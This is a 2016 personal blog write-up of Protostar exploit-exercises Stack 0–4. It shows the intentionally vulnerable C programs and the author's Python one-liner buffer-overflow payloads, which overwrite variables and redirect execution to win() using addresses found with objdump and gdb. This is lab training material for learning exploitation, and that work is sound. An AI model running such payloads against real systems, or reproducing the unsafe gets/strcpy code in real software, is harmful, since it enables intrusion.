499 lines
18 KiB
HTML
499 lines
18 KiB
HTML
|
||
|
||
|
||
<!DOCTYPE html>
|
||
<html>
|
||
<head>
|
||
<meta charset="utf-8">
|
||
<script type="text/javascript">
|
||
var host = "paul.walko.org";
|
||
if ((host == window.location.host) && (window.location.protocol != "https:"))
|
||
window.location.protocol = "https";
|
||
</script>
|
||
|
||
<script>
|
||
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
|
||
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
|
||
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
|
||
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
|
||
|
||
ga('create', 'UA-79393488-1', 'auto');
|
||
ga('send', 'pageview');
|
||
|
||
</script>
|
||
<meta http-equiv="X-UA-Compatible" content="IE=edge">
|
||
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||
<meta name="description" content="Walkthrough for Protostar exercises on exploit-exercises.com">
|
||
|
||
<title>Protostar Exploit Exercises Solutions 0-4</title>
|
||
|
||
<!-- favicon -->
|
||
<link rel="apple-touch-icon" sizes="57x57" href="https://paul.walko.org/favicon/apple-icon-57x57.png">
|
||
<link rel="apple-touch-icon" sizes="60x60" href="https://paul.walko.org/favicon/apple-icon-60x60.png">
|
||
<link rel="apple-touch-icon" sizes="72x72" href="https://paul.walko.org/favicon/apple-icon-72x72.png">
|
||
<link rel="apple-touch-icon" sizes="76x76" href="https://paul.walko.org/favicon/apple-icon-76x76.png">
|
||
<link rel="apple-touch-icon" sizes="114x114" href="https://paul.walko.org/favicon/apple-icon-114x114.png">
|
||
<link rel="apple-touch-icon" sizes="120x120" href="https://paul.walko.org/favicon/apple-icon-120x120.png">
|
||
<link rel="apple-touch-icon" sizes="144x144" href="https://paul.walko.org/favicon/apple-icon-144x144.png">
|
||
<link rel="apple-touch-icon" sizes="152x152" href="https://paul.walko.org/favicon/apple-icon-152x152.png">
|
||
<link rel="apple-touch-icon" sizes="180x180" href="https://paul.walko.org/favicon/apple-icon-180x180.png">
|
||
<link rel="icon" type="image/png" sizes="192x192" href="https://paul.walko.org/favicon/android-icon-192x192.png">
|
||
<link rel="icon" type="image/png" sizes="32x32" href="https://paul.walko.org/favicon/favicon-32x32.png">
|
||
<link rel="icon" type="image/png" sizes="96x96" href="https://paul.walko.org/favicon/favicon-96x96.png">
|
||
<link rel="icon" type="image/png" sizes="16x16" href="https://paul.walko.org/favicon/favicon-16x16.png">
|
||
<link rel="manifest" href="https://paul.walko.org/favicon/manifest.json">
|
||
<meta name="msapplication-TileColor" content="#ffffff">
|
||
<meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
|
||
<meta name="theme-color" content="#ffffff">
|
||
|
||
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/base.css">
|
||
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/simplePagination.css">
|
||
|
||
<script type="text/javascript" src="https://paul.walko.org/javascripts/jquery.js"></script>
|
||
|
||
|
||
|
||
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
|
||
|
||
<!--[if lt IE 9]>
|
||
<script src="https://paul.walko.org/javascripts/html5shiv.js"></script>
|
||
<![endif]-->
|
||
|
||
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/markdownreader.css">
|
||
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/pygments_monokai.css">
|
||
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/code_block.css">
|
||
|
||
</head>
|
||
|
||
<body>
|
||
<header id="l-header">
|
||
<div class="container">
|
||
<div class="row logo">
|
||
<div class="col-lg-7">
|
||
<h1>Paul Walko</h1>
|
||
</div>
|
||
</div>
|
||
|
||
<div class="row navicon">
|
||
<a href=""><i class="fa fa-navicon"></i></a>
|
||
</div>
|
||
|
||
<div class="row navbar">
|
||
<nav class="col-lg-8 col-md-8 col-xs-12">
|
||
<ul class="row">
|
||
<li class="col-lg-3"><a href="https://paul.walko.org/">HOME</a></li>
|
||
<li class="col-lg-3">
|
||
<ul class="subnav">
|
||
<a href="javascript:void(0)">POSTS</a>
|
||
<li><a href="https://paul.walko.org/category">CATEGORY</a></li>
|
||
<li><a href="https://paul.walko.org/tag">TAG</a></li>
|
||
</ul>
|
||
</li>
|
||
<li class="col-lg-3"><a href="https://paul.walko.org/about">ABOUT</a></li>
|
||
<li class="col-lg-3"><a href="https://paul.walko.org/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
|
||
</ul>
|
||
</nav>
|
||
|
||
<div class="search col-lg-4 col-md-4 col-xs-12">
|
||
<form id="dummySearch">
|
||
<label for="search"></label>
|
||
<input id="search" name="serach" type="text" placeholder="Not That Dummy Search">
|
||
<i class="fa fa-search"></i>
|
||
</form>
|
||
<script>
|
||
$(function(){
|
||
$('#dummySearch').submit(function(e) {
|
||
e.preventDefault();
|
||
keyword = $('#search').val();
|
||
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
|
||
location.href = url;
|
||
})
|
||
})
|
||
</script>
|
||
</div>
|
||
</div>
|
||
</div>
|
||
</header>
|
||
|
||
|
||
<div class="container">
|
||
<div class="row">
|
||
<div id="markdown-container" class="col-lg-9">
|
||
<header>
|
||
<p id="postTitle">Protostar Exploit Exercises Solutions 0-4</p>
|
||
|
||
<ul class="tags clearfix">
|
||
|
||
<li><i class="fa fa-tag"></i> exploit-exercises</li>
|
||
|
||
<li><i class="fa fa-tag"></i> protostar</li>
|
||
|
||
<li><i class="fa fa-tag"></i> hacking</li>
|
||
|
||
</ul>
|
||
|
||
<p id="postMeta">posted on 14 Jun 2016 under category <a href="https://paul.walko.org/category/">writeup</a></p>
|
||
|
||
</header>
|
||
|
||
<p>Note: When you first logon to protostar, make sure you are actually using bash. It will make things a lot easier.</p>
|
||
|
||
<h1 id="stack-0">Stack 0</h1>
|
||
|
||
<p>Here’s what we’re given:</p>
|
||
|
||
<div class="highlighter-rouge"><pre class="highlight"><code>#include <stdlib.h>
|
||
#include <unistd.h>
|
||
#include <stdio.h>
|
||
|
||
int main(int argc, char **argv)
|
||
{
|
||
volatile int modified;
|
||
char buffer[64];
|
||
|
||
modified = 0;
|
||
gets(buffer);
|
||
|
||
if(modified != 0) {
|
||
printf("you have changed the 'modified' variable\n");
|
||
} else {
|
||
printf("Try again?\n");
|
||
}
|
||
}
|
||
</code></pre>
|
||
</div>
|
||
|
||
<p>The first thing I took note of is the size of the <code class="highlighter-rouge">buffer</code>: 64 bytes. After that, the program inputs text for <code class="highlighter-rouge">buffer</code>, and then checks to see if you modified the <code class="highlighter-rouge">modified</code> variable.
|
||
I’m guessing if I put in a string longer than 64 bytes it will work. Let’s see:</p>
|
||
|
||
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*64'` | ./stack0
|
||
Try again?
|
||
</code></pre>
|
||
</div>
|
||
|
||
<p>That works as expected, now with 65 bytes:</p>
|
||
|
||
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*65'` | ./stack0
|
||
you have changed the 'modified' variable
|
||
</code></pre>
|
||
</div>
|
||
|
||
<p>Solved!</p>
|
||
|
||
<h1 id="stack-1">Stack 1</h1>
|
||
|
||
<p>Here’s the code we’re given:</p>
|
||
|
||
<div class="highlighter-rouge"><pre class="highlight"><code>#include <stdlib.h>
|
||
#include <unistd.h>
|
||
#include <stdio.h>
|
||
#include <string.h>
|
||
|
||
int main(int argc, char **argv)
|
||
{
|
||
volatile int modified;
|
||
char buffer[64];
|
||
|
||
if(argc == 1) {
|
||
errx(1, "please specify an argument\n");
|
||
}
|
||
|
||
modified = 0;
|
||
strcpy(buffer, argv[1]);
|
||
|
||
if(modified == 0x61626364) {
|
||
printf("you have correctly got the variable to the right value\n");
|
||
} else {
|
||
printf("Try again, you got 0x%08x\n", modified);
|
||
}
|
||
}
|
||
</code></pre>
|
||
</div>
|
||
|
||
<p>Just like Stack 0, we’re given a <code class="highlighter-rouge">buffer</code> array size 64 bytes and we’re also asked to input the contents of it. Except it looks like modified has to equal <code class="highlighter-rouge">0x61626364</code> instead of just changing it like before.</p>
|
||
|
||
<p>Keep in mind this is <a href="https://en.wikipedia.org/wiki/Endianness">little endian</a>, so I’ll input the value in reverse order:</p>
|
||
|
||
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64'`
|
||
Try again, you got 0x00000000
|
||
</code></pre>
|
||
</div>
|
||
|
||
<p>That works as expected, now with the additional bytes:</p>
|
||
|
||
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
|
||
you have correctly got the variable to the right value
|
||
</code></pre>
|
||
</div>
|
||
|
||
<p>Woo!</p>
|
||
|
||
<h1 id="stack-2">Stack 2</h1>
|
||
|
||
<p>The website says this one involves environment variables, and how they can be set, so let’s look at the code:</p>
|
||
|
||
<div class="highlighter-rouge"><pre class="highlight"><code>#include <stdlib.h>
|
||
#include <unistd.h>
|
||
#include <stdio.h>
|
||
#include <string.h>
|
||
|
||
int main(int argc, char **argv)
|
||
{
|
||
volatile int modified;
|
||
char buffer[64];
|
||
char *variable;
|
||
|
||
variable = getenv("GREENIE");
|
||
|
||
if(variable == NULL) {
|
||
errx(1, "please set the GREENIE environment variable\n");
|
||
}
|
||
|
||
modified = 0;
|
||
|
||
strcpy(buffer, variable);
|
||
|
||
if(modified == 0x0d0a0d0a) {
|
||
printf("you have correctly modified the variable\n");
|
||
} else {
|
||
printf("Try again, you got 0x%08x\n", modified);
|
||
}
|
||
|
||
}
|
||
</code></pre>
|
||
</div>
|
||
|
||
<p>There’s the <code class="highlighter-rouge">char buffer[64]</code> and <code class="highlighter-rouge">char *variable</code> again, then shortly after that it reads in the <code class="highlighter-rouge">GREENIE</code> environmental variable. Since <code class="highlighter-rouge">GREENIE</code> is copied to <code class="highlighter-rouge">buffer</code>, let’s see if appending <code class="highlighter-rouge">0x0d0a0d0a</code> to the end of some 64 bit string, since that’s what it compares in the if statement:</p>
|
||
|
||
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ export GREENIE=`python -c 'print "A"*64+"\x0a\x0d\x0a\x0d"'`
|
||
user@protostar:/opt/protostar/bin$ ./stack2
|
||
you have correctly modified the variable
|
||
</code></pre>
|
||
</div>
|
||
|
||
<h1 id="stack-3">Stack 3</h1>
|
||
|
||
<div class="highlighter-rouge"><pre class="highlight"><code>#include <stdlib.h>
|
||
#include <unistd.h>
|
||
#include <stdio.h>
|
||
#include <string.h>
|
||
|
||
void win()
|
||
{
|
||
printf("code flow successfully changed\n");
|
||
}
|
||
|
||
int main(int argc, char **argv)
|
||
{
|
||
volatile int (*fp)();
|
||
char buffer[64];
|
||
|
||
fp = 0;
|
||
|
||
gets(buffer);
|
||
|
||
if(fp) {
|
||
printf("calling function pointer, jumping to 0x%08x\n", fp);
|
||
fp();
|
||
}
|
||
}
|
||
</code></pre>
|
||
</div>
|
||
|
||
<p>It looks like I need to input a 64 byte buffer like previously, and then append the address of <code class="highlighter-rouge">win()</code>, which will write to <code class="highlighter-rouge">fp</code>.</p>
|
||
|
||
<p>First to figure out the address of win I ran <code class="highlighter-rouge">objdump -d stack3 | grep win</code> which outputs <code class="highlighter-rouge">08048424</code>:</p>
|
||
|
||
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ objdump -d stack3 | grep win
|
||
08048424 <win>:
|
||
</code></pre>
|
||
</div>
|
||
|
||
<p>And appending it to the buffer:</p>
|
||
|
||
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ echo `python -c 'print "A"*64 + "\x24\x84\x04\x08"'` | ./stack3
|
||
calling function pointer, jumping to 0x08048424
|
||
code flow successfully changed
|
||
</code></pre>
|
||
</div>
|
||
|
||
<h1 id="stack-4">Stack 4</h1>
|
||
|
||
<div class="highlighter-rouge"><pre class="highlight"><code>#include <stdlib.h>
|
||
#include <unistd.h>
|
||
#include <stdio.h>
|
||
#include <string.h>
|
||
|
||
void win()
|
||
{
|
||
printf("code flow successfully changed\n");
|
||
}
|
||
|
||
int main(int argc, char **argv)
|
||
{
|
||
char buffer[64];
|
||
|
||
gets(buffer);
|
||
}
|
||
</code></pre>
|
||
</div>
|
||
|
||
<p>This is similar to Stack 3, except it I need to add some extra padding to get to <code class="highlighter-rouge">win</code>.</p>
|
||
|
||
<p>First I’m going to get the memory address of <code class="highlighter-rouge">win</code>, but I won’t use this till the end:</p>
|
||
|
||
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ objdump -d stack4 | grep win
|
||
080483f4 <win>:
|
||
</code></pre>
|
||
</div>
|
||
|
||
<p>Now to figure out the padding, I ran gdb with and used binary search to figure out what the max buffer is:</p>
|
||
|
||
<p>First with predefined buffers of 50 and 100:</p>
|
||
|
||
<div class="highlighter-rouge"><pre class="highlight"><code>GNU gdb (GDB) 7.0.1-debian
|
||
Copyright (C) 2009 Free Software Foundation, Inc.
|
||
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
|
||
This is free software: you are free to change and redistribute it.
|
||
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
|
||
and "show warranty" for details.
|
||
This GDB was configured as "i486-linux-gnu".
|
||
For bug reporting instructions, please see:
|
||
<http://www.gnu.org/software/gdb/bugs/>...
|
||
Reading symbols from /opt/protostar/bin/stack4...done.
|
||
(gdb) r // with 50
|
||
Starting program: /opt/protostar/bin/stack4
|
||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||
|
||
Program exited with code 060.
|
||
(gdb) r // with 100
|
||
Starting program: /opt/protostar/bin/stack4
|
||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||
|
||
Program received signal SIGSEGV, Segmentation fault.
|
||
0x41414141 in ?? ()
|
||
(gdb) r // with ~75
|
||
The program being debugged has been started already.
|
||
Start it from the beginning? (y or n) y
|
||
Starting program: /opt/protostar/bin/stack4
|
||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||
|
||
Program exited with code 060.
|
||
(gdb) r //with ~80
|
||
Starting program: /opt/protostar/bin/stack4
|
||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||
|
||
Program received signal SIGSEGV, Segmentation fault.
|
||
0x41414141 in ?? ()
|
||
</code></pre>
|
||
</div>
|
||
|
||
<p>And now I figured out it’s somewhere around 80 by approximation, so I guessed than then 75, then 76:</p>
|
||
|
||
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ gdb ./stack4
|
||
GNU gdb (GDB) 7.0.1-debian
|
||
Copyright (C) 2009 Free Software Foundation, Inc.
|
||
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
|
||
This is free software: you are free to change and redistribute it.
|
||
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
|
||
and "show warranty" for details.
|
||
This GDB was configured as "i486-linux-gnu".
|
||
For bug reporting instructions, please see:
|
||
<http://www.gnu.org/software/gdb/bugs/>...
|
||
Reading symbols from /opt/protostar/bin/stack4...done.
|
||
(gdb) r // with 80
|
||
Starting program: /opt/protostar/bin/stack4
|
||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||
|
||
Program received signal SIGSEGV, Segmentation fault.
|
||
0x41414141 in ?? ()
|
||
(gdb) r // with 75
|
||
The program being debugged has been started already.
|
||
Start it from the beginning? (y or n) y
|
||
Starting program: /opt/protostar/bin/stack4
|
||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||
|
||
Program exited with code 060.
|
||
(gdb) r // with 76
|
||
Starting program: /opt/protostar/bin/stack4
|
||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||
|
||
Program received signal SIGSEGV, Segmentation fault.
|
||
0xb7eadc03 in __libc_start_main (main=Cannot access memory at address 0x41414149
|
||
) at libc-start.c:187
|
||
187 libc-start.c: No such file or directory.
|
||
in libc-start.c
|
||
(gdb) Woo => 76
|
||
</code></pre>
|
||
</div>
|
||
|
||
<p>Alright, so I know the buffer I need is 76, and the memory address of <code class="highlighter-rouge">win</code>:</p>
|
||
|
||
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ echo `python -c 'print "A"*76 + "\xf4\x83\x04\x08"'` | ./stack4
|
||
code flow successfully changed
|
||
</code></pre>
|
||
</div>
|
||
|
||
<p>There you go.</p>
|
||
|
||
<h1 id="stack-5">Stack 5</h1>
|
||
|
||
<p>Finally, we get to do some shellcode!</p>
|
||
|
||
<p>I have a good idea about how to do this, but unfortunately I can’t get something to work right, so I’ll update this as soon as I do.</p>
|
||
|
||
</div>
|
||
|
||
<div id="markdown-outline" class="col-lg-3">
|
||
</div>
|
||
|
||
<div id="disqus_thread"></div>
|
||
<script type="text/javascript">
|
||
/* * * CONFIGURATION VARIABLES * * */
|
||
var disqus_shortname = 'paulwalko';
|
||
|
||
/* * * DON'T EDIT BELOW THIS LINE * * */
|
||
(function() {
|
||
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
|
||
dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
|
||
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
|
||
})();
|
||
</script>
|
||
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
|
||
|
||
</div>
|
||
</div>
|
||
|
||
|
||
<footer id="l-footer">
|
||
<div class="container">
|
||
<div class="row">
|
||
<div id="contact" class="col-lg-6 col-lg-offset-1 col-md-6 col-md-offset-1 col-sm-9">
|
||
<h3>CONTACT</h3>
|
||
<div class="row">
|
||
<address id="address" class="col-lg-6 col-md-6 col-sm-6">
|
||
United States<br>
|
||
Paul Walko<br>
|
||
</address>
|
||
|
||
<ul class="col-lg-6 col-md-6 col-sm-6">
|
||
<li class="email"><i class="fa fa-envelope"></i> <a href="mailto:paulsw.pw@gmail.com"> paulsw.pw@gmail.com</a></li>
|
||
<li class="github"><i class="fa fa-github"></i> <a href="https://www.github.com/paulwalko"> https://www.github.com/paulwalko</a></li>
|
||
</ul>
|
||
</div>
|
||
</div>
|
||
</div>
|
||
|
||
<p id="legal">
|
||
Copyright (c) 2015 Paul Walko | Powered by <a href="http://jekyllrb.com">Jekyll</a> & <a href="http://github.com">GitHub</a> | designed & built by <a href="http://unifreak.github.io">UniFreak</a>
|
||
</p>
|
||
</div>
|
||
</footer>
|
||
|
||
<script type="text/javascript" src="https://paul.walko.org/javascripts/base.js"></script>
|
||
|
||
|
||
<script type="text/javascript" src="https://paul.walko.org/javascripts/markdownreader.js"></script>
|
||
</body>
|
||
</html>
|